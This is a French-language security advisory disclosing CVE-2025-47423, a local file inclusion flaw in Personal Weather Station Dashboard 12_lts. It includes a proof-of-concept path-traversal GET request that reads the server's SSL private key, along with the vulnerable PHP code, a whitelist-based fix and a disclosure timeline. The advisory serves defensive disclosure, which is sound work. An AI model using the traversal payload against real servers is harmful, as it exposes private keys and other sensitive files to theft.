
Divulgation détaillée de CVE-2025-47423 : Inclusion de fichier local dans le Tableau de bord de station météo personnelle 12_lts. Comprend un PoC, une analyse de code vulnérable et des recommandations de correctifs sécurisés pour l'apprentissage défensif.
Découvert par : Matthew Eagle
Statut : Divulgation publique
Date de signalement : 2025-05-05
ID CVE : CVE-2025-47423
Une vulnérabilité d'inclusion locale de fichiers (LFI) dans le Personal Weather Station Dashboard version 12_lts permet à des attaquants distants non authentifiés de lire des fichiers arbitraires sur le serveur. L'exploitation de cette faille permet d'accéder à des fichiers sensibles, y compris des clés SSL privées, compromettant potentiellement la confidentialité et l'intégrité des connexions HTTPS.
/others/_test.phptest (via GET)Cette faille permet aux attaquants distants de :
server.key)CVSS : 5.8 Moyen
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: www.example.com
Réponse :
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAs2omMqKSB+lm7xu9Nu3C5...
...TRUNCATED...
-----END RSA PRIVATE KEY-----
$script = trim($_GET['test']);
$script = str_replace('../','',$script);
include($script);
La fonction str_replace est insuffisante pour empêcher le parcours de répertoire.
basename() et vérifier par rapport aux fichiers autorisés$allowed_tests = ['index.php', 'module_test.php'];
$script = isset($_GET['test']) ? basename($_GET['test']) : 'index.php';
if (!in_array($script, $allowed_tests)) {
die("Invalid test file.");
}
include(__DIR__ . '/scripts/' . $script);
| Date | Événement |
|---|---|
| 2025-05-05 | Vulnérabilité signalée aux modérateurs du tableau de bord PWS |
| 2025-05-06 | Accusé de réception et tests observés |
| 2025-05-07 | CVE-2025-47423 réservé via MITRE |
| À déterminer | Correctif public et inscription CVE en attente |
Si vous utilisez Personal Weather Station Dashboard 12_lts, vous devez :
_test.phpVulnérabilité découverte et divulguée de manière responsable par Matthew Eagle
Contact : [email protected]
Divulgation coordonnée conformément aux directives de divulgation responsable. Ce document est publié à des fins éducatives et défensives.